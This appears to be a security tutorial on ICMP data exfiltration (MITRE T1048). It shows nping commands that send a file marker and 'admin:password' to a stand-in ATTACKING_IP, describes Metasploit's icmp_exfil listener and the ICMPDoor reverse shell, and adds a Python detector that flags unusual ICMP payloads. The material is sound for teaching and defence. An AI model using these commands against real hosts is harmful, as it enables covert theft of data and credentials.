MITRE ATT&CK™ - Exfiltration Over Alternative Protocol - Technique T1048
Theory
The Internet Control Message Protocol (ICMP) is a network-layer protocol used for error reporting.
ICMP Data Section
At a high level, the ICMP packet structure contains a Data section that can carry strings or copies of other information, such as the IPv4 header of the packet that triggered an error message. The following diagram shows the Data section, which is optional.
We can leverage this section to exfiltrate data.
Practice
On Linux targets, we can exfiltrate data with the -p option of the ping command.
Note that the -p option is only available on Linux operating systems. We can confirm this by checking ping's manual page.
Let's set up the Metasploit framework by selecting the icmp_exfil module so that it is ready to capture and listen for ICMP traffic. One of the requirements of this module is the BPF_FILTER option, which uses tcpdump filter syntax; set it to capture only ICMP packets and to ignore any ICMP packets whose source IP is the attacking machine, as follows.
# First, send the BOF trigger
v4resk@victime$ sudo nping --icmp -c 1 ATTACKING_IP --data-string "BOFfile.txt"
# Data
v4resk@victime$ sudo nping --icmp -c 1 ATTACKING_IP --data-string "admin:password"
# EOF end signal
v4resk@victime$ sudo nping --icmp -c 1 ATTACKING_IP --data-string "EOF"
ICMPDoor is an open-source reverse shell written in Python 3 and Scapy. The tool uses the same concept discussed earlier: the attacker uses the Data section of the ICMP packet. The only difference is that the attacker sends a command to be executed on the victim's machine; once the command has run, the victim machine sends the execution output back in the Data section of an ICMP packet.
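The defender's view of the same Data section, covering both the BOF/EOF transfer shown in the Practice section and the ICMPDoor-style command channel: an added example, not code from this page, from Metasploit or from ICMPDoor. It parses raw IPv4/ICMP frames with only the standard library, labels each echo payload as a normal ping fill (Windows' fixed alphabet pattern, or iputils' timestamp followed by incrementing bytes, as seen in Linux ping captures) or as text or binary that a ping client would not send, and rebuilds any BOF/EOF-framed transfers per source so an analyst can see what was carried. The sample frames, the addresses 10.0.0.5, 10.0.0.7, 10.0.0.1 and 203.0.113.9, and the helper names are all constructed here; the BOF and EOF markers come from the page.

```python
import struct
import ipaddress
import string

# Fixed 32-byte fill used by the Windows ping client.
WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"
PRINTABLE = set(string.printable.encode())


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the ICMP header and data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_request(src: str, dst: str, payload: bytes, seq: int = 1) -> bytes:
    """Construct an IPv4 + ICMP echo request frame (only used to build sample input here)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, seq) + payload
    icmp = struct.pack("!BBHHH", 8, 0, icmp_checksum(icmp), 0x1234, seq) + payload
    # IP header checksum is left at 0; the parser below does not verify it.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip + icmp


def parse_icmp_echo(frame: bytes):
    """Return (src, dst, data) for an ICMP echo request/reply frame, else None."""
    if len(frame) < 28 or frame[9] != 1:  # too short, or IP protocol != 1 (ICMP)
        return None
    ihl = (frame[0] & 0x0F) * 4
    icmp = frame[ihl:]
    if icmp[0] not in (0, 8):  # echo reply / echo request only
        return None
    if icmp_checksum(icmp) != 0:  # a valid header+data checksum folds to zero
        return None
    src = str(ipaddress.IPv4Address(frame[12:16]))
    dst = str(ipaddress.IPv4Address(frame[16:20]))
    return src, dst, icmp[8:]  # the Data section begins after the 8-byte ICMP header


def classify_payload(data: bytes) -> str:
    """Label the ICMP Data section as 'default-fill', 'text' or 'binary'."""
    if not data:
        return "default-fill"
    # Windows: the alphabet pattern, repeated or truncated to the size in use.
    if data == (WINDOWS_FILL * (len(data) // 32 + 1))[: len(data)]:
        return "default-fill"
    # Linux iputils: a 16-byte timestamp (8 on 32-bit builds), then byte i == i & 0xFF.
    for ts_len in (16, 8):
        if len(data) > ts_len and all(data[i] == (i & 0xFF) for i in range(ts_len, len(data))):
            return "default-fill"
    printable = sum(b in PRINTABLE for b in data) / len(data)
    return "text" if printable >= 0.9 else "binary"


def suspicious_frames(frames):
    """Return (src, dst, label, data) for every echo whose Data section is not a default fill."""
    hits = []
    for frame in frames:
        parsed = parse_icmp_echo(frame)
        if parsed is None:
            continue
        src, dst, data = parsed
        label = classify_payload(data)
        if label != "default-fill":
            hits.append((src, dst, label, data))
    return hits


def reassemble_exfil(frames, start=b"BOF", end=b"EOF"):
    """Rebuild BOF<name> ... EOF framed transfers per (src, dst) pair for forensic review."""
    open_sessions = {}  # (src, dst) -> {"name": str, "chunks": [bytes]}
    finished = {}       # (src, dst, name) -> reassembled bytes
    for frame in frames:
        parsed = parse_icmp_echo(frame)
        if parsed is None:
            continue
        src, dst, data = parsed
        key = (src, dst)
        if data.startswith(start):
            open_sessions[key] = {"name": data[len(start):].decode(errors="replace"), "chunks": []}
        elif data.startswith(end) and key in open_sessions:
            session = open_sessions.pop(key)
            finished[(src, dst, session["name"])] = b"".join(session["chunks"])
        elif key in open_sessions:
            open_sessions[key]["chunks"].append(data)
    return finished


# Constructed sample traffic: one ordinary 64-bit Linux ping, then one BOF/EOF transfer.
LINUX_DEFAULT = bytes(16) + bytes(range(16, 56))  # timestamp slot + 0x10..0x37
SAMPLE_FRAMES = [
    build_echo_request("10.0.0.5", "10.0.0.1", LINUX_DEFAULT, seq=1),
    build_echo_request("10.0.0.7", "203.0.113.9", b"BOFfile.txt", seq=1),
    build_echo_request("10.0.0.7", "203.0.113.9", b"admin:password", seq=2),
    build_echo_request("10.0.0.7", "203.0.113.9", b"EOF", seq=3),
]

if __name__ == "__main__":
    for hit in suspicious_frames(SAMPLE_FRAMES):
        print("non-default ICMP payload:", hit)
    print("reassembled transfers:", reassemble_exfil(SAMPLE_FRAMES))
```

The default-fill check is what separates ordinary monitoring noise from payloads worth a look; in a real pipeline the same classifier would run over frames read from a pcap, and a per-source count of "text" or "binary" echoes, or an unusually high echo rate to a single external host, is the signal to alert on. Note that an ICMPDoor-style channel carrying command output shows up under the same labels, so the check does not depend on the BOF/EOF framing.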